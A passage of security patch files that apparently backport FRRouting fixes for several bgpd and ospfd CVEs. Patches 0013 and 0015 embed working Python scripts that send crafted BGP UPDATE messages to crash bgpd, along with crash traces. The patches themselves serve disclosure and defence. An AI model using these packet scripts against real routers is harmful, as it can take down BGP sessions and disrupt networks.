format_address(from), ifp->name);
- continue;
+ goto done;
}
changed = update_neighbour(neigh, seqno, interval);
--
2.35.3

37
0012-bgpd-Limit-flowspec-to-no-attribute-means-a-implicit.patch
View File

@ -1,37 +0,0 @@
From 168204de6371f594c4f1ebac30ca3e181a851e39 Mon Sep 17 00:00:00 2001
From: Donald Sharp <sharpd@nvidia.com>
Date: Wed, 5 Apr 2023 14:57:05 -0400
Subject: [PATCH] bgpd: Limit flowspec to no attribute means a implicit
withdrawal
Upsteam: yes
References: CVE-2023-41909,bsc#1215065,https://github.com/FRRouting/frr/pull/13222/commits/cfd04dcb3e689754a72507d086ba3b9709fc5ed8
All other parsing functions done from bgp_nlri_parse() assume
no attributes == an implicit withdrawal. Let's move
bgp_nlri_parse_flowspec() into the same alignment.
Reported-by: Matteo Memelli <mmemelli@amazon.it>
Signed-off-by: Donald Sharp <sharpd@nvidia.com>
Signed-off-by: Marius Tomaschewski <mt@suse.com>
diff --git a/bgpd/bgp_flowspec.c b/bgpd/bgp_flowspec.c
index 39c0cfe514..fe1f0d50f8 100644
--- a/bgpd/bgp_flowspec.c
+++ b/bgpd/bgp_flowspec.c
@@ -112,6 +112,13 @@ int bgp_nlri_parse_flowspec(struct peer *peer, struct attr *attr,
afi = packet->afi;
safi = packet->safi;
+ /*
+ * All other AFI/SAFI's treat no attribute as a implicit
+ * withdraw. Flowspec should as well.
+ */
+ if (!attr)
+ withdraw = 1;
+
if (packet->length >= FLOWSPEC_NLRI_SIZELIMIT_EXTENDED) {
flog_err(EC_BGP_FLOWSPEC_PACKET,
"BGP flowspec nlri length maximum reached (%u)",
--
2.35.3

115
0013-bgpd-Check-mandatory-attributes-more-carefully-for-U.patch
View File

@ -1,115 +0,0 @@
From 1fdbfffbe343ad63c32ff37998300b0b4f67d8fb Mon Sep 17 00:00:00 2001
From: Donatas Abraitis <donatas@opensourcerouting.org>
Date: Mon, 23 Oct 2023 23:34:10 +0300
Subject: [PATCH] bgpd: Check mandatory attributes more carefully for UPDATE
message
Upstream: yes
References: CVE-2023-46753,bsc#1216626,https://github.com/FRRouting/frr/pull/14655/commits/21418d64af11553c402f932b0311c812d98ac3e4
If we send a crafted BGP UPDATE message without mandatory attributes, we do
not check if the length of the path attributes is zero or not. We only check
if attr->flag is at least set or not. Imagine we send only unknown transit
attribute, then attr->flag is always 0. Also, this is true only if graceful-restart
capability is received.
A crash:
```
bgpd[7834]: [TJ23Y-GY0RH] 127.0.0.1 Unknown attribute is received (type 31, length 16)
bgpd[7834]: [PCFFM-WMARW] 127.0.0.1(donatas-pc) rcvd UPDATE wlen 0 attrlen 20 alen 17
BGP[7834]: Received signal 11 at 1698089639 (si_addr 0x0, PC 0x55eefd375b4a); aborting...
BGP[7834]: /usr/local/lib/libfrr.so.0(zlog_backtrace_sigsafe+0x6d) [0x7f3205ca939d]
BGP[7834]: /usr/local/lib/libfrr.so.0(zlog_signal+0xf3) [0x7f3205ca9593]
BGP[7834]: /usr/local/lib/libfrr.so.0(+0xf5181) [0x7f3205cdd181]
BGP[7834]: /lib/x86_64-linux-gnu/libpthread.so.0(+0x12980) [0x7f3204ff3980]
BGP[7834]: /usr/lib/frr/bgpd(+0x18ab4a) [0x55eefd375b4a]
BGP[7834]: /usr/local/lib/libfrr.so.0(route_map_apply_ext+0x310) [0x7f3205cd1290]
BGP[7834]: /usr/lib/frr/bgpd(+0x163610) [0x55eefd34e610]
BGP[7834]: /usr/lib/frr/bgpd(bgp_update+0x9a5) [0x55eefd35c1d5]
BGP[7834]: /usr/lib/frr/bgpd(bgp_nlri_parse_ip+0xb7) [0x55eefd35e867]
BGP[7834]: /usr/lib/frr/bgpd(+0x1555e6) [0x55eefd3405e6]
BGP[7834]: /usr/lib/frr/bgpd(bgp_process_packet+0x747) [0x55eefd345597]
BGP[7834]: /usr/local/lib/libfrr.so.0(event_call+0x83) [0x7f3205cef4a3]
BGP[7834]: /usr/local/lib/libfrr.so.0(frr_run+0xc0) [0x7f3205ca10a0]
BGP[7834]: /usr/lib/frr/bgpd(main+0x409) [0x55eefd2dc979]
```
Sending:
```
import socket
import time
OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02"
b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02"
b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00"
b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d"
b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01"
b"\x80\x00\x00\x00")
KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
b"\xff\xff\xff\xff\xff\xff\x00\x13\x04")
UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff003c0200000014ff1f001000040146464646460004464646464646664646f50d05800100010200ffff000000")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.2', 179))
s.send(OPEN)
data = s.recv(1024)
s.send(KEEPALIVE)
data = s.recv(1024)
s.send(UPDATE)
data = s.recv(1024)
time.sleep(1000)
s.close()
```
Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
(cherry picked from commit d8482bf011cb2b173e85b65b4bf3d5061250cdb9)
Signed-off-by: Marius Tomaschewski <mt@suse.com>
diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
index 188393b752..5c028c854c 100644
--- a/bgpd/bgp_attr.c
+++ b/bgpd/bgp_attr.c
@@ -3098,13 +3098,15 @@ bgp_attr_unknown(struct bgp_attr_parser_args *args)
}
/* Well-known attribute check. */
-static int bgp_attr_check(struct peer *peer, struct attr *attr)
+static int bgp_attr_check(struct peer *peer, struct attr *attr,
+ bgp_size_t length)
{
uint8_t type = 0;
/* BGP Graceful-Restart End-of-RIB for IPv4 unicast is signaled as an
* empty UPDATE. */
- if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag)
+ if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag &&
+ !length)
return BGP_ATTR_PARSE_PROCEED;
/* "An UPDATE message that contains the MP_UNREACH_NLRI is not required
@@ -3156,7 +3158,7 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr,
enum bgp_attr_parse_ret ret;
uint8_t flag = 0;
uint8_t type = 0;
- bgp_size_t length;
+ bgp_size_t length = 0;
uint8_t *startp, *endp;
uint8_t *attr_endp;
uint8_t seen[BGP_ATTR_BITMAP_SIZE];
@@ -3478,7 +3480,7 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr,
}
/* Check all mandatory well-known attributes are present */
- ret = bgp_attr_check(peer, attr);
+ ret = bgp_attr_check(peer, attr, length);
if (ret < 0)
goto done;
--
2.35.3

121
0014-bgpd-Handle-MP_REACH_NLRI-malformed-packets-with-ses.patch
View File

@ -1,121 +0,0 @@
From f2bc4e6847b222ed8fbd460fbba9aa69d1bf8d0e Mon Sep 17 00:00:00 2001
From: Donatas Abraitis <donatas@opensourcerouting.org>
Date: Fri, 20 Oct 2023 17:49:18 +0300
Subject: [PATCH] bgpd: Handle MP_REACH_NLRI malformed packets with session
reset
Upstream: yes
References: CVE-2023-46752,bsc#1216627,https://github.com/FRRouting/frr/pull/14645/commits/b08afc81c60607a4f736f418f2e3eb06087f1a35
Avoid crashing bgpd.
```
(gdb)
bgp_mp_reach_parse (args=<optimized out>, mp_update=0x7fffffffe140) at bgpd/bgp_attr.c:2341
2341 stream_get(&attr->mp_nexthop_global, s, IPV6_MAX_BYTELEN);
(gdb)
stream_get (dst=0x7fffffffe1ac, s=0x7ffff0006e80, size=16) at lib/stream.c:320
320 {
(gdb)
321 STREAM_VERIFY_SANE(s);
(gdb)
323 if (STREAM_READABLE(s) < size) {
(gdb)
34 return __builtin___memcpy_chk (__dest, __src, __len, __bos0 (__dest));
(gdb)
Thread 1 "bgpd" received signal SIGSEGV, Segmentation fault.
0x00005555556e37be in route_set_aspath_prepend (rule=0x555555aac0d0, prefix=0x7fffffffe050,
object=0x7fffffffdb00) at bgpd/bgp_routemap.c:2282
2282 if (path->attr->aspath->refcnt)
(gdb)
```
With the configuration:
```
neighbor 127.0.0.1 remote-as external
neighbor 127.0.0.1 passive
neighbor 127.0.0.1 ebgp-multihop
neighbor 127.0.0.1 disable-connected-check
neighbor 127.0.0.1 update-source 127.0.0.2
neighbor 127.0.0.1 timers 3 90
neighbor 127.0.0.1 timers connect 1
address-family ipv4 unicast
redistribute connected
neighbor 127.0.0.1 default-originate
neighbor 127.0.0.1 route-map RM_IN in
exit-address-family
!
route-map RM_IN permit 10
set as-path prepend 200
exit
```
Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
(cherry picked from commit b08afc81c60607a4f736f418f2e3eb06087f1a35)
Signed-off-by: Marius Tomaschewski <mt@suse.com>
diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
index 5c028c854c..42a2342f6f 100644
--- a/bgpd/bgp_attr.c
+++ b/bgpd/bgp_attr.c
@@ -2224,7 +2224,7 @@ int bgp_mp_reach_parse(struct bgp_attr_parser_args *args,
mp_update->afi = afi;
mp_update->safi = safi;
- return BGP_ATTR_PARSE_EOR;
+ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_MAL_ATTR, 0);
}
mp_update->afi = afi;
@@ -3405,10 +3405,6 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr,
goto done;
}
- if (ret == BGP_ATTR_PARSE_EOR) {
- goto done;
- }
-
if (ret == BGP_ATTR_PARSE_ERROR) {
flog_warn(EC_BGP_ATTRIBUTE_PARSE_ERROR,
"%s: Attribute %s, parse error", peer->host,
diff --git a/bgpd/bgp_attr.h b/bgpd/bgp_attr.h
index 4963ea64d0..23767153b2 100644
--- a/bgpd/bgp_attr.h
+++ b/bgpd/bgp_attr.h
@@ -382,7 +382,6 @@ enum bgp_attr_parse_ret {
/* only used internally, send notify + convert to BGP_ATTR_PARSE_ERROR
*/
BGP_ATTR_PARSE_ERROR_NOTIFYPLS = -3,
- BGP_ATTR_PARSE_EOR = -4,
};
struct bpacket_attr_vec_arr;
diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c
index 1ef421028f..20c642190b 100644
--- a/bgpd/bgp_packet.c
+++ b/bgpd/bgp_packet.c
@@ -2027,8 +2027,7 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size)
* Non-MP IPv4/Unicast EoR is a completely empty UPDATE
* and MP EoR should have only an empty MP_UNREACH
*/
- if ((!update_len && !withdraw_len && nlris[NLRI_MP_UPDATE].length == 0)
- || (attr_parse_ret == BGP_ATTR_PARSE_EOR)) {
+ if (!update_len && !withdraw_len && nlris[NLRI_MP_UPDATE].length == 0) {
afi_t afi = 0;
safi_t safi;
struct graceful_restart_info *gr_info;
@@ -2049,9 +2048,6 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size)
&& nlris[NLRI_MP_WITHDRAW].length == 0) {
afi = nlris[NLRI_MP_WITHDRAW].afi;
safi = nlris[NLRI_MP_WITHDRAW].safi;
- } else if (attr_parse_ret == BGP_ATTR_PARSE_EOR) {
- afi = nlris[NLRI_MP_UPDATE].afi;
- safi = nlris[NLRI_MP_UPDATE].safi;
}
if (afi && peer->afc[afi][safi]) {
--
2.35.3

109
0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch
View File

@ -1,109 +0,0 @@
From fcd12ca92baf2be4b191ddc3d3021c276c635930 Mon Sep 17 00:00:00 2001
From: Donatas Abraitis <donatas@opensourcerouting.org>
Date: Fri, 27 Oct 2023 11:56:45 +0300
Subject: [PATCH] bgpd: Treat EOR as withdrawn to avoid unwanted handling of
malformed attrs
Upstream: yes
CVE-2023-47235,bsc#1216896,https://github.com/FRRouting/frr/pull/14716/commits/6814f2e0138a6ea5e1f83bdd9085d9a77999900b
Treat-as-withdraw, otherwise if we just ignore it, we will pass it to be
processed as a normal UPDATE without mandatory attributes, that could lead
to harmful behavior. In this case, a crash for route-maps with the configuration
such as:
```
router bgp 65001
no bgp ebgp-requires-policy
neighbor 127.0.0.1 remote-as external
neighbor 127.0.0.1 passive
neighbor 127.0.0.1 ebgp-multihop
neighbor 127.0.0.1 disable-connected-check
neighbor 127.0.0.1 update-source 127.0.0.2
neighbor 127.0.0.1 timers 3 90
neighbor 127.0.0.1 timers connect 1
!
address-family ipv4 unicast
neighbor 127.0.0.1 addpath-tx-all-paths
neighbor 127.0.0.1 default-originate
neighbor 127.0.0.1 route-map RM_IN in
exit-address-family
exit
!
route-map RM_IN permit 10
set as-path prepend 200
exit
```
Send a malformed optional transitive attribute:
```
import socket
import time
OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02"
b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02"
b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00"
b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d"
b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01"
b"\x80\x00\x00\x00")
KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
b"\xff\xff\xff\xff\xff\xff\x00\x13\x04")
UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff002b0200000003c0ff00010100eb00ac100b0b001ad908ac100b0b")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.2', 179))
s.send(OPEN)
data = s.recv(1024)
s.send(KEEPALIVE)
data = s.recv(1024)
s.send(UPDATE)
data = s.recv(1024)
time.sleep(100)
s.close()
```
Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
Signed-off-by: Marius Tomaschewski <mt@suse.com>
diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
index 42a2342f6f..fc92dbb326 100644
--- a/bgpd/bgp_attr.c
+++ b/bgpd/bgp_attr.c
@@ -3104,10 +3104,13 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr,
uint8_t type = 0;
/* BGP Graceful-Restart End-of-RIB for IPv4 unicast is signaled as an
- * empty UPDATE. */
+ * empty UPDATE. Treat-as-withdraw, otherwise if we just ignore it,
+ * we will pass it to be processed as a normal UPDATE without mandatory
+ * attributes, that could lead to harmful behavior.
+ */
if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag &&
!length)
- return BGP_ATTR_PARSE_PROCEED;
+ return BGP_ATTR_PARSE_WITHDRAW;
/* "An UPDATE message that contains the MP_UNREACH_NLRI is not required
to carry any other path attributes.", though if MP_REACH_NLRI or NLRI
@@ -3532,7 +3535,13 @@ done:
aspath_unintern(&as4_path);
transit = bgp_attr_get_transit(attr);
- if (ret != BGP_ATTR_PARSE_ERROR) {
+ /* If we received an UPDATE with mandatory attributes, then
+ * the unrecognized transitive optional attribute of that
+ * path MUST be passed. Otherwise, it's an error, and from
+ * security perspective it might be very harmful if we continue
+ * here with the unrecognized attributes.
+ */
+ if (ret == BGP_ATTR_PARSE_PROCEED) {
/* Finally intern unknown attribute. */
if (transit)
bgp_attr_set_transit(attr, transit_intern(transit));
--
2.35.3

90
0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch
View File

@ -1,90 +0,0 @@
From 4e39893cfb2d4dbc13fa6d6a25bbf623ed14a4fb Mon Sep 17 00:00:00 2001
From: Donatas Abraitis <donatas@opensourcerouting.org>
Date: Sun, 29 Oct 2023 22:44:45 +0200
Subject: [PATCH] bgpd: Ignore handling NLRIs if we received MP_UNREACH_NLRI
Upstream: yes
CVE-2023-47234,bsc#1216897,https://github.com/FRRouting/frr/pull/14716/commits/c37119df45bbf4ef713bc10475af2ee06e12f3bf
If we receive MP_UNREACH_NLRI, we should stop handling remaining NLRIs if
no mandatory path attributes received.
In other words, if MP_UNREACH_NLRI received, the remaining NLRIs should be handled
as a new data, but without mandatory attributes, it's a malformed packet.
In normal case, this MUST not happen at all, but to avoid crashing bgpd, we MUST
handle that.
Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
Signed-off-by: Marius Tomaschewski <mt@suse.com>
diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
index fc92dbb326..ae0f052c42 100644
--- a/bgpd/bgp_attr.c
+++ b/bgpd/bgp_attr.c
@@ -3112,15 +3112,6 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr,
!length)
return BGP_ATTR_PARSE_WITHDRAW;
- /* "An UPDATE message that contains the MP_UNREACH_NLRI is not required
- to carry any other path attributes.", though if MP_REACH_NLRI or NLRI
- are present, it should. Check for any other attribute being present
- instead.
- */
- if ((!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) &&
- CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI))))
- return BGP_ATTR_PARSE_PROCEED;
-
if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_ORIGIN)))
type = BGP_ATTR_ORIGIN;
@@ -3139,6 +3130,16 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr,
&& !CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_LOCAL_PREF)))
type = BGP_ATTR_LOCAL_PREF;
+ /* An UPDATE message that contains the MP_UNREACH_NLRI is not required
+ * to carry any other path attributes. Though if MP_REACH_NLRI or NLRI
+ * are present, it should. Check for any other attribute being present
+ * instead.
+ */
+ if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) &&
+ CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI)))
+ return type ? BGP_ATTR_PARSE_MISSING_MANDATORY
+ : BGP_ATTR_PARSE_PROCEED;
+
/* If any of the well-known mandatory attributes are not present
* in an UPDATE message, then "treat-as-withdraw" MUST be used.
*/
diff --git a/bgpd/bgp_attr.h b/bgpd/bgp_attr.h
index 23767153b2..27708c0689 100644
--- a/bgpd/bgp_attr.h
+++ b/bgpd/bgp_attr.h
@@ -382,6 +382,7 @@ enum bgp_attr_parse_ret {
/* only used internally, send notify + convert to BGP_ATTR_PARSE_ERROR
*/
BGP_ATTR_PARSE_ERROR_NOTIFYPLS = -3,
+ BGP_ATTR_PARSE_MISSING_MANDATORY = -4,
};
struct bpacket_attr_vec_arr;
diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c
index 20c642190b..b175a26ab9 100644
--- a/bgpd/bgp_packet.c
+++ b/bgpd/bgp_packet.c
@@ -1951,7 +1951,12 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size)
/* Network Layer Reachability Information. */
update_len = end - stream_pnt(s);
- if (update_len && attribute_len) {
+ /* If we received MP_UNREACH_NLRI attribute, but also NLRIs, then
+ * NLRIs should be handled as a new data. Though, if we received
+ * NLRIs without mandatory attributes, they should be ignored.
+ */
+ if (update_len && attribute_len &&
+ attr_parse_ret != BGP_ATTR_PARSE_MISSING_MANDATORY) {
/* Set NLRI portion to structure. */
nlris[NLRI_UPDATE].afi = AFI_IP;
nlris[NLRI_UPDATE].safi = SAFI_UNICAST;
--
2.35.3

58
0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch
View File

@ -1,58 +0,0 @@
From 6979aa1574167121e260120504c77b47bb25230e Mon Sep 17 00:00:00 2001
From: Donald Sharp <sharpd@nvidia.com>
Date: Fri, 3 Mar 2023 21:58:33 -0500
Subject: [PATCH] bgpd: Fix use beyond end of stream of labeled unicast parsing
Upstream: yes
CVE-2023-38407,bsc#1216899,https://github.com/FRRouting/frr/pull/12956/commits/ab362eae68edec12c175d9bc488bcc3f8b73d36f
Fixes a couple crashes associated with attempting to read
beyond the end of the stream.
Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donald Sharp <sharpd@nvidia.com>
(cherry picked from commit 7404a914b0cafe046703c8381903a80d3def8f8b)
Signed-off-by: Marius Tomaschewski <mt@suse.com>
diff --git a/bgpd/bgp_label.c b/bgpd/bgp_label.c
index 38f34a8927..64d1ff70ca 100644
--- a/bgpd/bgp_label.c
+++ b/bgpd/bgp_label.c
@@ -312,6 +312,9 @@ static int bgp_nlri_get_labels(struct peer *peer, uint8_t *pnt, uint8_t plen,
uint8_t llen = 0;
uint8_t label_depth = 0;
+ if (plen < BGP_LABEL_BYTES)
+ return 0;
+
for (; data < lim; data += BGP_LABEL_BYTES) {
memcpy(label, data, BGP_LABEL_BYTES);
llen += BGP_LABEL_BYTES;
@@ -374,6 +377,9 @@ int bgp_nlri_parse_label(struct peer *peer, struct attr *attr,
memcpy(&addpath_id, pnt, BGP_ADDPATH_ID_LEN);
addpath_id = ntohl(addpath_id);
pnt += BGP_ADDPATH_ID_LEN;
+
+ if (pnt >= lim)
+ return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW;
}
/* Fetch prefix length. */
@@ -392,6 +398,15 @@ int bgp_nlri_parse_label(struct peer *peer, struct attr *attr,
/* Fill in the labels */
llen = bgp_nlri_get_labels(peer, pnt, psize, &label);
+ if (llen == 0) {
+ flog_err(
+ EC_BGP_UPDATE_RCV,
+ "%s [Error] Update packet error (wrong label length 0)",
+ peer->host);
+ bgp_notify_send(peer, BGP_NOTIFY_UPDATE_ERR,
+ BGP_NOTIFY_UPDATE_INVAL_NETWORK);
+ return BGP_NLRI_PARSE_ERROR_LABEL_LENGTH;
+ }
p.prefixlen = prefixlen - BSIZE(llen);
/* There needs to be at least one label */
--
2.35.3

37
0018-bgpd-Flowspec-overflow-issue.patch
View File

@ -1,37 +0,0 @@
From d4ead6bc0b2f0d4682661837d202502127060476 Mon Sep 17 00:00:00 2001
From: Donald Sharp <sharpd@nvidia.com>
Date: Thu, 23 Feb 2023 13:29:32 -0500
Subject: [PATCH] bgpd: Flowspec overflow issue
Upstream: yes
CVE-2023-38406,bsc#1216900,https://github.com/FRRouting/frr/pull/12884/commits/0b999c886e241c52bd1f7ef0066700e4b618ebb3
According to the flowspec RFC 8955 a flowspec nlri is <length, <nlri data>>
Specifying 0 as a length makes BGP get all warm on the inside. Which
in this case is not a good thing at all. Prevent warmth, stay cold
on the inside.
Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donald Sharp <sharpd@nvidia.com>
Signed-off-by: Marius Tomaschewski <mt@suse.com>
diff --git a/bgpd/bgp_flowspec.c b/bgpd/bgp_flowspec.c
index fe1f0d50f8..98ec1ed073 100644
--- a/bgpd/bgp_flowspec.c
+++ b/bgpd/bgp_flowspec.c
@@ -148,6 +148,13 @@ int bgp_nlri_parse_flowspec(struct peer *peer, struct attr *attr,
psize);
return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW;
}
+
+ if (psize == 0) {
+ flog_err(EC_BGP_FLOWSPEC_PACKET,
+ "Flowspec NLRI length 0 which makes no sense");
+ return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW;
+ }
+
if (bgp_fs_nlri_validate(pnt, psize, afi) < 0) {
flog_err(
EC_BGP_FLOWSPEC_PACKET,
--
2.35.3

121
0019-bgpd-fix-error-handling-when-receiving-BGP-Prefix-SID-attribute.patch
View File

@ -1,121 +0,0 @@
From 51679e4504546584d98673b76ed8e12a8bc74fe0 Mon Sep 17 00:00:00 2001
From: Donatas Abraitis <donatas@opensourcerouting.org>
Date: Wed, 27 Mar 2024 18:42:56 +0200
Subject: [PATCH 1/2] bgpd: Fix error handling when receiving BGP Prefix SID
attribute
References: bsc#1222518 CVE-2024-31948 gh#FRRouting/frr#15628
Without this patch, we always set the BGP Prefix SID attribute flag without
checking if it's malformed or not. RFC8669 says that this attribute MUST be discarded.
Also, this fixes the bgpd crash when a malformed Prefix SID attribute is received,
with malformed transitive flags and/or TLVs.
Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
(cherry picked from commit ba6a8f1a31e1a88df2de69ea46068e8bd9b97138)
---
bgpd/bgp_attr.c | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
index 7144c4bfa73d..2e2845b8fa7e 100644
--- a/bgpd/bgp_attr.c
+++ b/bgpd/bgp_attr.c
@@ -1400,6 +1400,7 @@ bgp_attr_malformed(struct bgp_attr_parser_args *args, uint8_t subcode,
case BGP_ATTR_AS4_AGGREGATOR:
case BGP_ATTR_AGGREGATOR:
case BGP_ATTR_ATOMIC_AGGREGATE:
+ case BGP_ATTR_PREFIX_SID:
return BGP_ATTR_PARSE_PROCEED;
/* Core attributes, particularly ones which may influence route
@@ -3146,8 +3147,6 @@ enum bgp_attr_parse_ret bgp_attr_prefix_sid(struct bgp_attr_parser_args *args)
struct attr *const attr = args->attr;
enum bgp_attr_parse_ret ret;
- attr->flag |= ATTR_FLAG_BIT(BGP_ATTR_PREFIX_SID);
-
uint8_t type;
uint16_t length;
size_t headersz = sizeof(type) + sizeof(length);
@@ -3197,6 +3196,8 @@ enum bgp_attr_parse_ret bgp_attr_prefix_sid(struct bgp_attr_parser_args *args)
}
}
+ SET_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_PREFIX_SID));
+
return BGP_ATTR_PARSE_PROCEED;
}
From 9240abccb564043c85180916b77cad5b194a49c9 Mon Sep 17 00:00:00 2001
From: Donatas Abraitis <donatas@opensourcerouting.org>
Date: Wed, 27 Mar 2024 19:08:38 +0200
Subject: [PATCH 2/2] bgpd: Prevent from one more CVE triggering this place
References: bsc#1222518 CVE-2024-31948 gh#FRRouting/frr#15628
Upstream: submitted
If we receive an attribute that is handled by bgp_attr_malformed(), use
treat-as-withdraw behavior for unknown (or missing to add - if new) attributes.
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
(cherry picked from commit babb23b74855e23c987a63f8256d24e28c044d07)
---
bgpd/bgp_attr.c | 33 ++++++++++++++++++++++-----------
1 file changed, 22 insertions(+), 11 deletions(-)
diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
index 2e2845b8fa7e..7570598a3d7f 100644
--- a/bgpd/bgp_attr.c
+++ b/bgpd/bgp_attr.c
@@ -1391,6 +1391,15 @@ bgp_attr_malformed(struct bgp_attr_parser_args *args, uint8_t subcode,
(args->startp - STREAM_DATA(BGP_INPUT(peer)))
+ args->total);
+ /* Partial optional attributes that are malformed should not cause
+ * the whole session to be reset. Instead treat it as a withdrawal
+ * of the routes, if possible.
+ */
+ if (CHECK_FLAG(flags, BGP_ATTR_FLAG_TRANS) &&
+ CHECK_FLAG(flags, BGP_ATTR_FLAG_OPTIONAL) &&
+ CHECK_FLAG(flags, BGP_ATTR_FLAG_PARTIAL))
+ return BGP_ATTR_PARSE_WITHDRAW;
+
switch (args->type) {
/* where an attribute is relatively inconsequential, e.g. it does not
* affect route selection, and can be safely ignored, then any such
@@ -1425,19 +1434,21 @@ bgp_attr_malformed(struct bgp_attr_parser_args *args, uint8_t subcode,
bgp_notify_send_with_data(peer, BGP_NOTIFY_UPDATE_ERR, subcode,
notify_datap, length);
return BGP_ATTR_PARSE_ERROR;
+ default:
+ /* Unknown attributes, that are handled by this function
+ * should be treated as withdraw, to prevent one more CVE
+ * from being introduced.
+ * RFC 7606 says:
+ * The "treat-as-withdraw" approach is generally preferred
+ * and the "session reset" approach is discouraged.
+ */
+ flog_err(EC_BGP_ATTR_FLAG,
+ "%s(%u) attribute received, while it is not known how to handle it, treating as withdraw",
+ lookup_msg(attr_str, args->type, NULL), args->type);
+ break;
}
- /* Partial optional attributes that are malformed should not cause
- * the whole session to be reset. Instead treat it as a withdrawal
- * of the routes, if possible.
- */
- if (CHECK_FLAG(flags, BGP_ATTR_FLAG_TRANS)
- && CHECK_FLAG(flags, BGP_ATTR_FLAG_OPTIONAL)
- && CHECK_FLAG(flags, BGP_ATTR_FLAG_PARTIAL))
- return BGP_ATTR_PARSE_WITHDRAW;
-
- /* default to reset */
- return BGP_ATTR_PARSE_ERROR_NOTIFYPLS;
+ return BGP_ATTR_PARSE_WITHDRAW;
}
/* Find out what is wrong with the path attribute flag bits and log the error.

37
0020-ospfd-Solved-crash-in-OSPF-TE-parsing.patch
View File

@ -1,37 +0,0 @@
From 285c19a3c665087720e1fea7d8d944c961c52288 Mon Sep 17 00:00:00 2001
From: Olivier Dugeon <olivier.dugeon@orange.com>
Date: Mon, 26 Feb 2024 10:40:34 +0100
Subject: [PATCH] ospfd: Solved crash in OSPF TE parsing
Upstream: yes
References: bsc#1220548, CVE-2024-27913, gh#FRRouting/frr#15431
Iggy Frankovic discovered an ospfd crash when perfomring fuzzing of OSPF LSA
packets. The crash occurs in ospf_te_parse_te() function when attemping to
create corresponding egde from TE Link parameters. If there is no local
address, an edge is created but without any attributes. During parsing, the
function try to access to this attribute fields which has not been created
causing an ospfd crash.
